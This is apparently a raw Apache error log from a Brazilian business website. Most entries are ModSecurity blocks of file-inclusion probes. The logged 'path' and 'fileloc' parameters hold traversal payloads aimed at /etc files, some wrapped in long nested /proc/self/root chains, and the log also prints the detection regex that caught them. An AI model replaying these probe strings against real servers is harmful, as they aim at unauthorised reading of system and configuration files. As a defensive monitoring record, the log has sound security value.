[Tue Mar 17 15:00:44.779243 2026] [:error] [pid 6296:tid 140411548894976] [client 216.73.216.191:27577] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWzHIk7brgkOH-rIWQ8wAAAVc"]
[Tue Mar 17 15:00:49.118883 2026] [:error] [pid 2473:tid 140411674785536] [client 216.73.216.191:33281] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmW0aBJNF7axNlVR0UdhgAAAAg"]
[Tue Mar 17 15:00:56.638418 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:48202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmW2NY0UrI5A3LftIwB2gAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:02.211311 2026] [:error] [pid 2473:tid 140411582465792] [client 216.73.216.191:50651] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmW3qBJNF7axNlVR0UdigAAABM"]
[Tue Mar 17 15:01:08.141871 2026] [proxy_fcgi:error] [pid 7004:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49464] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:01:33.805803 2026] [proxy_fcgi:error] [pid 7437:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:01:40.635467 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:37672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXBNY0UrI5A3LftIwB9gAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:41.587259 2026] [:error] [pid 2598:tid 140411632822016] [client 216.73.216.191:43878] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXBRj0p0SRWAqcjGF-2wAAAw0"]
[Tue Mar 17 15:01:44.885048 2026] [:error] [pid 29151:tid 140411699963648] [client 74.7.241.31:42564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXCPPqhzTj3BvfDX-NSAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:46.493252 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:42578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXChj0p0SRWAqcjGF-3gAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:47.817350 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:48504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXC9Y0UrI5A3LftIwB_AAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:49.275198 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.31:48520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXDQeiSKl8TjouI-Ye1AAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:49.739317 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:48520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXDQeiSKl8TjouI-Ye1gAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:51.900783 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.31:48530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXD6BJNF7axNlVR0UdqgAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:54.023854 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:48546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXEhj0p0SRWAqcjGF-4wAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:01:57.125860 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50848] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:01:58.255363 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:48550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXFhj0p0SRWAqcjGF-6AAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:02.067449 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.31:54818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXGQeiSKl8TjouI-Ye6QAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:07.907163 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:54820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXHhj0p0SRWAqcjGF-6wAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:09.362782 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:50164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXIXIk7brgkOH-rIWRGQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:13.878626 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:50178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXJdY0UrI5A3LftIwCDgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:14.085382 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:50178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXJtY0UrI5A3LftIwCEAAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:17.790920 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:55812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXKa4xEDsg_V3ESNZRhAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:20.133805 2026] [proxy_fcgi:error] [pid 7437:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51696] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:02:23.166013 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:55828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXL6BJNF7axNlVR0UdvAAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:02:26.163696 2026] [:error] [pid 29151:tid 140411599251200] [client 74.7.241.31:55842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXMvPqhzTj3BvfDX-NZQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
